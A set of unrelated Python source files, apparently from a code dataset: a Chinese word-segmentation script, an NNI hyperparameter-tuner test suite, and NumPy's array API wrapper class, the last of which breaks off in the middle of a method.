multiplicity=Multiplicity.ZERO_MANY, properties_fvalues=[ {"property_type": PropertyType.CHAR_VALUE} ], )
the-stack_106_24399
#!/usr/bin/env python2 # coding:utf-8 import sys from mmseg import seg_txt for line in sys.stdin: blks = str.split(line) out_line = blks[0] for i in range(1, len(blks)): if blks[i] == "[VOCALIZED-NOISE]" or blks[i] == "[NOISE]" or blks[i] == "[LAUGHTER]": out_line += " " + blks[i] continue for j in seg_txt(blks[i]): out_line += " " + j print(out_line)
the-stack_106_24401
# Copyright (c) Microsoft Corporation. All rights reserved. # # MIT License # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and # associated documentation files (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, publish, distribute, # sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all copies or # substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT # NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT # OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # ================================================================================================== import glob import json import logging import os import shutil import sys from unittest import TestCase, main from nni.batch_tuner.batch_tuner import BatchTuner from nni.evolution_tuner.evolution_tuner import EvolutionTuner from nni.gp_tuner.gp_tuner import GPTuner from nni.gridsearch_tuner.gridsearch_tuner import GridSearchTuner from nni.hyperopt_tuner.hyperopt_tuner import HyperoptTuner from nni.metis_tuner.metis_tuner import MetisTuner try: from nni.smac_tuner.smac_tuner import SMACTuner except ImportError: assert sys.platform == "win32" from nni.tuner import Tuner logging.basicConfig(level=logging.INFO) logger = logging.getLogger('test_tuner') class TunerTestCase(TestCase): """ Targeted at testing functions of built-in tuners, including - [ ] load_checkpoint - [ ] save_checkpoint - [X] update_search_space - [X] generate_multiple_parameters - [ ] import_data - [ ] trial_end - [ ] receive_trial_result """ def search_space_test_one(self, tuner_factory, search_space): tuner = tuner_factory() self.assertIsInstance(tuner, Tuner) tuner.update_search_space(search_space) parameters = tuner.generate_multiple_parameters(list(range(0, 50))) logger.info(parameters) self.check_range(parameters, search_space) if not parameters: # TODO: not strict raise ValueError("No parameters generated") return parameters def check_range(self, generated_params, search_space): EPS = 1E-6 for param in generated_params: if self._testMethodName == "test_batch": param = {list(search_space.keys())[0]: param} for k, v in param.items(): if k.startswith("_mutable_layer"): _, block, layer, choice = k.split("/") cand = search_space[block]["_value"][layer].get(choice) # cand could be None, e.g., optional_inputs_chosen_state if choice == "layer_choice": self.assertIn(v, cand) if choice == "optional_input_size": if isinstance(cand, int): self.assertEqual(v, cand) else: self.assertGreaterEqual(v, cand[0]) self.assertLessEqual(v, cand[1]) if choice == "optional_inputs": pass # ignore for now continue item = search_space[k] if item["_type"] == "choice": self.assertIn(v, item["_value"]) if item["_type"] == "randint": self.assertIsInstance(v, int) if item["_type"] == "uniform": self.assertIsInstance(v, float) if item["_type"] in ("randint", "uniform", "quniform", "loguniform", "qloguniform"): self.assertGreaterEqual(v, item["_value"][0]) self.assertLessEqual(v, item["_value"][1]) if item["_type"].startswith("q"): multiple = v / item["_value"][2] print(k, v, multiple, item) if item["_value"][0] + EPS < v < item["_value"][1] - EPS: self.assertAlmostEqual(int(round(multiple)), multiple) if item["_type"] in ("qlognormal", "lognormal"): self.assertGreaterEqual(v, 0) if item["_type"] == "mutable_layer": for layer_name in item["_value"].keys(): self.assertIn(v[layer_name]["chosen_layer"], item["layer_choice"]) def search_space_test_all(self, tuner_factory, supported_types=None, ignore_types=None): # NOTE(yuge): ignore types # Supported types are listed in the table. They are meant to be supported and should be correct. # Other than those, all the rest are "unsupported", which are expected to produce ridiculous results # or throw some exceptions. However, there are certain types I can't check. For example, generate # "normal" using GP Tuner returns successfully and results are fine if we check the range (-inf to +inf), # but they make no sense: it's not a normal distribution. So they are ignored in tests for now. with open(os.path.join(os.path.dirname(__file__), "assets/search_space.json"), "r") as fp: search_space_all = json.load(fp) if supported_types is None: supported_types = ["choice", "randint", "uniform", "quniform", "loguniform", "qloguniform", "normal", "qnormal", "lognormal", "qlognormal"] full_supported_search_space = dict() for single in search_space_all: single_keyword = single.split("_") space = search_space_all[single] expected_fail = not any([t in single_keyword for t in supported_types]) or "fail" in single_keyword if ignore_types is not None and any([t in ignore_types for t in single_keyword]): continue if "fail" in space: if self._testMethodName.split("_", 1)[1] in space.pop("fail"): expected_fail = True single_search_space = {single: space} if not expected_fail: # supports this key self.search_space_test_one(tuner_factory, single_search_space) full_supported_search_space.update(single_search_space) else: # unsupported key with self.assertRaises(Exception, msg="Testing {}".format(single)) as cm: self.search_space_test_one(tuner_factory, single_search_space) logger.info("%s %s %s", tuner_factory, single, cm.exception) if not any(t in self._testMethodName for t in ["batch", "grid_search"]): # grid search fails for too many combinations logger.info("Full supported search space: %s", full_supported_search_space) self.search_space_test_one(tuner_factory, full_supported_search_space) def test_grid_search(self): self.search_space_test_all(lambda: GridSearchTuner(), supported_types=["choice", "randint", "quniform"]) def test_tpe(self): self.search_space_test_all(lambda: HyperoptTuner("tpe")) def test_random_search(self): self.search_space_test_all(lambda: HyperoptTuner("random_search")) def test_anneal(self): self.search_space_test_all(lambda: HyperoptTuner("anneal")) def test_smac(self): if sys.platform == "win32": return # smac doesn't work on windows self.search_space_test_all(lambda: SMACTuner(), supported_types=["choice", "randint", "uniform", "quniform", "loguniform"]) def test_batch(self): self.search_space_test_all(lambda: BatchTuner(), supported_types=["choice"]) def test_evolution(self): # Needs enough population size, otherwise it will throw a runtime error self.search_space_test_all(lambda: EvolutionTuner(population_size=100)) def test_gp(self): self.search_space_test_all(lambda: GPTuner(), supported_types=["choice", "randint", "uniform", "quniform", "loguniform", "qloguniform"], ignore_types=["normal", "lognormal", "qnormal", "qlognormal"]) def test_metis(self): self.search_space_test_all(lambda: MetisTuner(), supported_types=["choice", "randint", "uniform", "quniform"]) def test_networkmorphism(self): pass def test_ppo(self): pass def tearDown(self): file_list = glob.glob("smac3*") + ["param_config_space.pcs", "scenario.txt", "model_path"] for file in file_list: if os.path.exists(file): if os.path.isdir(file): shutil.rmtree(file) else: os.remove(file) if __name__ == '__main__': main()
the-stack_106_24404
""" Wrapper class around the ndarray object for the array API standard. The array API standard defines some behaviors differently than ndarray, in particular, type promotion rules are different (the standard has no value-based casting). The standard also specifies a more limited subset of array methods and functionalities than are implemented on ndarray. Since the goal of the array_api namespace is to be a minimal implementation of the array API standard, we need to define a separate wrapper class for the array_api namespace. The standard compliant class is only a wrapper class. It is *not* a subclass of ndarray. """ from __future__ import annotations import operator from enum import IntEnum from ._creation_functions import asarray from ._dtypes import ( _all_dtypes, _boolean_dtypes, _integer_dtypes, _integer_or_boolean_dtypes, _floating_dtypes, _numeric_dtypes, _result_type, _dtype_categories, ) from typing import TYPE_CHECKING, Optional, Tuple, Union, Any import types if TYPE_CHECKING: from ._typing import Any, PyCapsule, Device, Dtype import numpy.typing as npt import numpy as np from numpy import array_api class Array: """ n-d array object for the array API namespace. See the docstring of :py:obj:`np.ndarray <numpy.ndarray>` for more information. This is a wrapper around numpy.ndarray that restricts the usage to only those things that are required by the array API namespace. Note, attributes on this object that start with a single underscore are not part of the API specification and should only be used internally. This object should not be constructed directly. Rather, use one of the creation functions, such as asarray(). """ _array: np.ndarray # Use a custom constructor instead of __init__, as manually initializing # this class is not supported API. @classmethod def _new(cls, x, /): """ This is a private method for initializing the array API Array object. Functions outside of the array_api submodule should not use this method. Use one of the creation functions instead, such as ``asarray``. """ obj = super().__new__(cls) # Note: The spec does not have array scalars, only 0-D arrays. if isinstance(x, np.generic): # Convert the array scalar to a 0-D array x = np.asarray(x) if x.dtype not in _all_dtypes: raise TypeError( f"The array_api namespace does not support the dtype '{x.dtype}'" ) obj._array = x return obj # Prevent Array() from working def __new__(cls, *args, **kwargs): raise TypeError( "The array_api Array object should not be instantiated directly. Use an array creation function, such as asarray(), instead." ) # These functions are not required by the spec, but are implemented for # the sake of usability. def __str__(self: Array, /) -> str: """ Performs the operation __str__. """ return self._array.__str__().replace("array", "Array") def __repr__(self: Array, /) -> str: """ Performs the operation __repr__. """ suffix = f", dtype={self.dtype.name})" if 0 in self.shape: prefix = "empty(" mid = str(self.shape) else: prefix = "Array(" mid = np.array2string(self._array, separator=', ', prefix=prefix, suffix=suffix) return prefix + mid + suffix # This function is not required by the spec, but we implement it here for # convenience so that np.asarray(np.array_api.Array) will work. def __array__(self, dtype: None | np.dtype[Any] = None) -> npt.NDArray[Any]: """ Warning: this method is NOT part of the array API spec. Implementers of other libraries need not include it, and users should not assume it will be present in other implementations. """ return np.asarray(self._array, dtype=dtype) # These are various helper functions to make the array behavior match the # spec in places where it either deviates from or is more strict than # NumPy behavior def _check_allowed_dtypes(self, other: bool | int | float | Array, dtype_category: str, op: str) -> Array: """ Helper function for operators to only allow specific input dtypes Use like other = self._check_allowed_dtypes(other, 'numeric', '__add__') if other is NotImplemented: return other """ if self.dtype not in _dtype_categories[dtype_category]: raise TypeError(f"Only {dtype_category} dtypes are allowed in {op}") if isinstance(other, (int, float, bool)): other = self._promote_scalar(other) elif isinstance(other, Array): if other.dtype not in _dtype_categories[dtype_category]: raise TypeError(f"Only {dtype_category} dtypes are allowed in {op}") else: return NotImplemented # This will raise TypeError for type combinations that are not allowed # to promote in the spec (even if the NumPy array operator would # promote them). res_dtype = _result_type(self.dtype, other.dtype) if op.startswith("__i"): # Note: NumPy will allow in-place operators in some cases where # the type promoted operator does not match the left-hand side # operand. For example, # >>> a = np.array(1, dtype=np.int8) # >>> a += np.array(1, dtype=np.int16) # The spec explicitly disallows this. if res_dtype != self.dtype: raise TypeError( f"Cannot perform {op} with dtypes {self.dtype} and {other.dtype}" ) return other # Helper function to match the type promotion rules in the spec def _promote_scalar(self, scalar): """ Returns a promoted version of a Python scalar appropriate for use with operations on self. This may raise an OverflowError in cases where the scalar is an integer that is too large to fit in a NumPy integer dtype, or TypeError when the scalar type is incompatible with the dtype of self. """ if isinstance(scalar, bool): if self.dtype not in _boolean_dtypes: raise TypeError( "Python bool scalars can only be promoted with bool arrays" ) elif isinstance(scalar, int): if self.dtype in _boolean_dtypes: raise TypeError( "Python int scalars cannot be promoted with bool arrays" ) elif isinstance(scalar, float): if self.dtype not in _floating_dtypes: raise TypeError( "Python float scalars can only be promoted with floating-point arrays." ) else: raise TypeError("'scalar' must be a Python scalar") # Note: the spec only specifies integer-dtype/int promotion # behavior for integers within the bounds of the integer dtype. # Outside of those bounds we use the default NumPy behavior (either # cast or raise OverflowError). return Array._new(np.array(scalar, self.dtype)) @staticmethod def _normalize_two_args(x1, x2) -> Tuple[Array, Array]: """ Normalize inputs to two arg functions to fix type promotion rules NumPy deviates from the spec type promotion rules in cases where one argument is 0-dimensional and the other is not. For example: >>> import numpy as np >>> a = np.array([1.0], dtype=np.float32) >>> b = np.array(1.0, dtype=np.float64) >>> np.add(a, b) # The spec says this should be float64 array([2.], dtype=float32) To fix this, we add a dimension to the 0-dimension array before passing it through. This works because a dimension would be added anyway from broadcasting, so the resulting shape is the same, but this prevents NumPy from not promoting the dtype. """ # Another option would be to use signature=(x1.dtype, x2.dtype, None), # but that only works for ufuncs, so we would have to call the ufuncs # directly in the operator methods. One should also note that this # sort of trick wouldn't work for functions like searchsorted, which # don't do normal broadcasting, but there aren't any functions like # that in the array API namespace. if x1.ndim == 0 and x2.ndim != 0: # The _array[None] workaround was chosen because it is relatively # performant. broadcast_to(x1._array, x2.shape) is much slower. We # could also manually type promote x2, but that is more complicated # and about the same performance as this. x1 = Array._new(x1._array[None]) elif x2.ndim == 0 and x1.ndim != 0: x2 = Array._new(x2._array[None]) return (x1, x2) # Note: A large fraction of allowed indices are disallowed here (see the # docstring below) @staticmethod def _validate_index(key, shape): """ Validate an index according to the array API. The array API specification only requires a subset of indices that are supported by NumPy. This function will reject any index that is allowed by NumPy but not required by the array API specification. We always raise ``IndexError`` on such indices (the spec does not require any specific behavior on them, but this makes the NumPy array API namespace a minimal implementation of the spec). See https://data-apis.org/array-api/latest/API_specification/indexing.html for the full list of required indexing behavior This function either raises IndexError if the index ``key`` is invalid, or a new key to be used in place of ``key`` in indexing. It only raises ``IndexError`` on indices that are not already rejected by NumPy, as NumPy will already raise the appropriate error on such indices. ``shape`` may be None, in which case, only cases that are independent of the array shape are checked. The following cases are allowed by NumPy, but not specified by the array API specification: - Indices to not include an implicit ellipsis at the end. That is, every axis of an array must be explicitly indexed or an ellipsis included. - The start and stop of a slice may not be out of bounds. In particular, for a slice ``i:j:k`` on an axis of size ``n``, only the following are allowed: - ``i`` or ``j`` omitted (``None``). - ``-n <= i <= max(0, n - 1)``. - For ``k > 0`` or ``k`` omitted (``None``), ``-n <= j <= n``. - For ``k < 0``, ``-n - 1 <= j <= max(0, n - 1)``. - Boolean array indices are not allowed as part of a larger tuple index. - Integer array indices are not allowed (with the exception of 0-D arrays, which are treated the same as scalars). Additionally, it should be noted that indices that would return a scalar in NumPy will return a 0-D array. Array scalars are not allowed in the specification, only 0-D arrays. This is done in the ``Array._new`` constructor, not this function. """ if isinstance(key, slice): if shape is None: return key if shape == (): return key if len(shape) > 1: raise IndexError( "Multidimensional arrays must include an index for every axis or use an ellipsis" ) size = shape[0] # Ensure invalid slice entries are passed through. if key.start is not None: try: operator.index(key.start) except TypeError: return key if not (-size <= key.start <= size): raise IndexError( "Slices with out-of-bounds start are not allowed in the array API namespace" ) if key.stop is not None: try: operator.index(key.stop) except TypeError: return key step = 1 if key.step is None else key.step if (step > 0 and not (-size <= key.stop <= size) or step < 0 and not (-size - 1 <= key.stop <= max(0, size - 1))): raise IndexError("Slices with out-of-bounds stop are not allowed in the array API namespace") return key elif isinstance(key, tuple): key = tuple(Array._validate_index(idx, None) for idx in key) for idx in key: if ( isinstance(idx, np.ndarray) and idx.dtype in _boolean_dtypes or isinstance(idx, (bool, np.bool_)) ): if len(key) == 1: return key raise IndexError( "Boolean array indices combined with other indices are not allowed in the array API namespace" ) if isinstance(idx, tuple): raise IndexError( "Nested tuple indices are not allowed in the array API namespace" ) if shape is None: return key n_ellipsis = key.count(...) if n_ellipsis > 1: return key ellipsis_i = key.index(...) if n_ellipsis else len(key) for idx, size in list(zip(key[:ellipsis_i], shape)) + list( zip(key[:ellipsis_i:-1], shape[:ellipsis_i:-1]) ): Array._validate_index(idx, (size,)) if n_ellipsis == 0 and len(key) < len(shape): raise IndexError( "Multidimensional arrays must include an index for every axis or use an ellipsis" ) return key elif isinstance(key, bool): return key elif isinstance(key, Array): if key.dtype in _integer_dtypes: if key.ndim != 0: raise IndexError( "Non-zero dimensional integer array indices are not allowed in the array API namespace" ) return key._array elif key is Ellipsis: return key elif key is None: raise IndexError( "newaxis indices are not allowed in the array API namespace" ) try: key = operator.index(key) if shape is not None and len(shape) > 1: raise IndexError( "Multidimensional arrays must include an index for every axis or use an ellipsis" ) return key except TypeError: # Note: This also omits boolean arrays that are not already in # Array() form, like a list of booleans. raise IndexError( "Only integers, slices (`:`), ellipsis (`...`), and boolean arrays are valid indices in the array API namespace" ) # Everything below this line is required by the spec. def __abs__(self: Array, /) -> Array: """ Performs the operation __abs__. """ if self.dtype not in _numeric_dtypes: raise TypeError("Only numeric dtypes are allowed in __abs__") res = self._array.__abs__() return self.__class__._new(res) def __add__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __add__. """ other = self._check_allowed_dtypes(other, "numeric", "__add__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__add__(other._array) return self.__class__._new(res) def __and__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __and__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__and__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__and__(other._array) return self.__class__._new(res) def __array_namespace__( self: Array, /, *, api_version: Optional[str] = None ) -> types.ModuleType: if api_version is not None and not api_version.startswith("2021."): raise ValueError(f"Unrecognized array API version: {api_version!r}") return array_api def __bool__(self: Array, /) -> bool: """ Performs the operation __bool__. """ # Note: This is an error here. if self._array.ndim != 0: raise TypeError("bool is only allowed on arrays with 0 dimensions") if self.dtype not in _boolean_dtypes: raise ValueError("bool is only allowed on boolean arrays") res = self._array.__bool__() return res def __dlpack__(self: Array, /, *, stream: None = None) -> PyCapsule: """ Performs the operation __dlpack__. """ return self._array.__dlpack__(stream=stream) def __dlpack_device__(self: Array, /) -> Tuple[IntEnum, int]: """ Performs the operation __dlpack_device__. """ # Note: device support is required for this return self._array.__dlpack_device__() def __eq__(self: Array, other: Union[int, float, bool, Array], /) -> Array: """ Performs the operation __eq__. """ # Even though "all" dtypes are allowed, we still require them to be # promotable with each other. other = self._check_allowed_dtypes(other, "all", "__eq__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__eq__(other._array) return self.__class__._new(res) def __float__(self: Array, /) -> float: """ Performs the operation __float__. """ # Note: This is an error here. if self._array.ndim != 0: raise TypeError("float is only allowed on arrays with 0 dimensions") if self.dtype not in _floating_dtypes: raise ValueError("float is only allowed on floating-point arrays") res = self._array.__float__() return res def __floordiv__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __floordiv__. """ other = self._check_allowed_dtypes(other, "numeric", "__floordiv__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__floordiv__(other._array) return self.__class__._new(res) def __ge__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __ge__. """ other = self._check_allowed_dtypes(other, "numeric", "__ge__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__ge__(other._array) return self.__class__._new(res) def __getitem__( self: Array, key: Union[ int, slice, ellipsis, Tuple[Union[int, slice, ellipsis], ...], Array ], /, ) -> Array: """ Performs the operation __getitem__. """ # Note: Only indices required by the spec are allowed. See the # docstring of _validate_index key = self._validate_index(key, self.shape) res = self._array.__getitem__(key) return self._new(res) def __gt__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __gt__. """ other = self._check_allowed_dtypes(other, "numeric", "__gt__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__gt__(other._array) return self.__class__._new(res) def __int__(self: Array, /) -> int: """ Performs the operation __int__. """ # Note: This is an error here. if self._array.ndim != 0: raise TypeError("int is only allowed on arrays with 0 dimensions") if self.dtype not in _integer_dtypes: raise ValueError("int is only allowed on integer arrays") res = self._array.__int__() return res def __index__(self: Array, /) -> int: """ Performs the operation __index__. """ res = self._array.__index__() return res def __invert__(self: Array, /) -> Array: """ Performs the operation __invert__. """ if self.dtype not in _integer_or_boolean_dtypes: raise TypeError("Only integer or boolean dtypes are allowed in __invert__") res = self._array.__invert__() return self.__class__._new(res) def __le__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __le__. """ other = self._check_allowed_dtypes(other, "numeric", "__le__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__le__(other._array) return self.__class__._new(res) def __lshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs the operation __lshift__. """ other = self._check_allowed_dtypes(other, "integer", "__lshift__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__lshift__(other._array) return self.__class__._new(res) def __lt__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __lt__. """ other = self._check_allowed_dtypes(other, "numeric", "__lt__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__lt__(other._array) return self.__class__._new(res) def __matmul__(self: Array, other: Array, /) -> Array: """ Performs the operation __matmul__. """ # matmul is not defined for scalars, but without this, we may get # the wrong error message from asarray. other = self._check_allowed_dtypes(other, "numeric", "__matmul__") if other is NotImplemented: return other res = self._array.__matmul__(other._array) return self.__class__._new(res) def __mod__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __mod__. """ other = self._check_allowed_dtypes(other, "numeric", "__mod__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__mod__(other._array) return self.__class__._new(res) def __mul__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __mul__. """ other = self._check_allowed_dtypes(other, "numeric", "__mul__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__mul__(other._array) return self.__class__._new(res) def __ne__(self: Array, other: Union[int, float, bool, Array], /) -> Array: """ Performs the operation __ne__. """ other = self._check_allowed_dtypes(other, "all", "__ne__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__ne__(other._array) return self.__class__._new(res) def __neg__(self: Array, /) -> Array: """ Performs the operation __neg__. """ if self.dtype not in _numeric_dtypes: raise TypeError("Only numeric dtypes are allowed in __neg__") res = self._array.__neg__() return self.__class__._new(res) def __or__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __or__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__or__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__or__(other._array) return self.__class__._new(res) def __pos__(self: Array, /) -> Array: """ Performs the operation __pos__. """ if self.dtype not in _numeric_dtypes: raise TypeError("Only numeric dtypes are allowed in __pos__") res = self._array.__pos__() return self.__class__._new(res) # PEP 484 requires int to be a subtype of float, but __pow__ should not # accept int. def __pow__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __pow__. """ from ._elementwise_functions import pow other = self._check_allowed_dtypes(other, "floating-point", "__pow__") if other is NotImplemented: return other # Note: NumPy's __pow__ does not follow type promotion rules for 0-d # arrays, so we use pow() here instead. return pow(self, other) def __rshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs the operation __rshift__. """ other = self._check_allowed_dtypes(other, "integer", "__rshift__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rshift__(other._array) return self.__class__._new(res) def __setitem__( self, key: Union[ int, slice, ellipsis, Tuple[Union[int, slice, ellipsis], ...], Array ], value: Union[int, float, bool, Array], /, ) -> None: """ Performs the operation __setitem__. """ # Note: Only indices required by the spec are allowed. See the # docstring of _validate_index key = self._validate_index(key, self.shape) self._array.__setitem__(key, asarray(value)._array) def __sub__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __sub__. """ other = self._check_allowed_dtypes(other, "numeric", "__sub__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__sub__(other._array) return self.__class__._new(res) # PEP 484 requires int to be a subtype of float, but __truediv__ should # not accept int. def __truediv__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __truediv__. """ other = self._check_allowed_dtypes(other, "floating-point", "__truediv__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__truediv__(other._array) return self.__class__._new(res) def __xor__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __xor__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__xor__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__xor__(other._array) return self.__class__._new(res) def __iadd__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __iadd__. """ other = self._check_allowed_dtypes(other, "numeric", "__iadd__") if other is NotImplemented: return other self._array.__iadd__(other._array) return self def __radd__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __radd__. """ other = self._check_allowed_dtypes(other, "numeric", "__radd__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__radd__(other._array) return self.__class__._new(res) def __iand__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __iand__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__iand__") if other is NotImplemented: return other self._array.__iand__(other._array) return self def __rand__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __rand__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__rand__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rand__(other._array) return self.__class__._new(res) def __ifloordiv__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __ifloordiv__. """ other = self._check_allowed_dtypes(other, "numeric", "__ifloordiv__") if other is NotImplemented: return other self._array.__ifloordiv__(other._array) return self def __rfloordiv__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __rfloordiv__. """ other = self._check_allowed_dtypes(other, "numeric", "__rfloordiv__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rfloordiv__(other._array) return self.__class__._new(res) def __ilshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs the operation __ilshift__. """ other = self._check_allowed_dtypes(other, "integer", "__ilshift__") if other is NotImplemented: return other self._array.__ilshift__(other._array) return self def __rlshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs the operation __rlshift__. """ other = self._check_allowed_dtypes(other, "integer", "__rlshift__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rlshift__(other._array) return self.__class__._new(res) def __imatmul__(self: Array, other: Array, /) -> Array: """ Performs the operation __imatmul__. """ # Note: NumPy does not implement __imatmul__. # matmul is not defined for scalars, but without this, we may get # the wrong error message from asarray. other = self._check_allowed_dtypes(other, "numeric", "__imatmul__") if other is NotImplemented: return other # __imatmul__ can only be allowed when it would not change the shape # of self. other_shape = other.shape if self.shape == () or other_shape == (): raise ValueError("@= requires at least one dimension") if len(other_shape) == 1 or other_shape[-1] != other_shape[-2]: raise ValueError("@= cannot change the shape of the input array") self._array[:] = self._array.__matmul__(other._array) return self def __rmatmul__(self: Array, other: Array, /) -> Array: """ Performs the operation __rmatmul__. """ # matmul is not defined for scalars, but without this, we may get # the wrong error message from asarray. other = self._check_allowed_dtypes(other, "numeric", "__rmatmul__") if other is NotImplemented: return other res = self._array.__rmatmul__(other._array) return self.__class__._new(res) def __imod__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __imod__. """ other = self._check_allowed_dtypes(other, "numeric", "__imod__") if other is NotImplemented: return other self._array.__imod__(other._array) return self def __rmod__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __rmod__. """ other = self._check_allowed_dtypes(other, "numeric", "__rmod__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rmod__(other._array) return self.__class__._new(res) def __imul__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __imul__. """ other = self._check_allowed_dtypes(other, "numeric", "__imul__") if other is NotImplemented: return other self._array.__imul__(other._array) return self def __rmul__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __rmul__. """ other = self._check_allowed_dtypes(other, "numeric", "__rmul__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rmul__(other._array) return self.__class__._new(res) def __ior__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __ior__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__ior__") if other is NotImplemented: return other self._array.__ior__(other._array) return self def __ror__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __ror__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__ror__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__ror__(other._array) return self.__class__._new(res) def __ipow__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __ipow__. """ other = self._check_allowed_dtypes(other, "floating-point", "__ipow__") if other is NotImplemented: return other self._array.__ipow__(other._array) return self def __rpow__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __rpow__. """ from ._elementwise_functions import pow other = self._check_allowed_dtypes(other, "floating-point", "__rpow__") if other is NotImplemented: return other # Note: NumPy's __pow__ does not follow the spec type promotion rules # for 0-d arrays, so we use pow() here instead. return pow(other, self) def __irshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs the operation __irshift__. """ other = self._check_allowed_dtypes(other, "integer", "__irshift__") if other is NotImplemented: return other self._array.__irshift__(other._array) return self def __rrshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs the operation __rrshift__. """ other = self._check_allowed_dtypes(other, "integer", "__rrshift__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rrshift__(other._array) return self.__class__._new(res) def __isub__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __isub__. """ other = self._check_allowed_dtypes(other, "numeric", "__isub__") if other is NotImplemented: return other self._array.__isub__(other._array) return self def __rsub__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __rsub__. """ other = self._check_allowed_dtypes(other, "numeric", "__rsub__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rsub__(other._array) return self.__class__._new(res) def __itruediv__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __itruediv__. """ other = self._check_allowed_dtypes(other, "floating-point", "__itruediv__") if other is NotImplemented: return other self._array.__itruediv__(other._array) return self def __rtruediv__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __rtruediv__. """ other = self._check_allowed_dtypes(other, "floating-point", "__rtruediv__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rtruediv__(other._array) return self.__class__._new(res) def __ixor__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __ixor__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__ixor__") if other is NotImplemented: return other self._array.__ixor__(other._array) return self def __rxor__(self: Array, other: Union[int, bool, Array], /) -> Array: 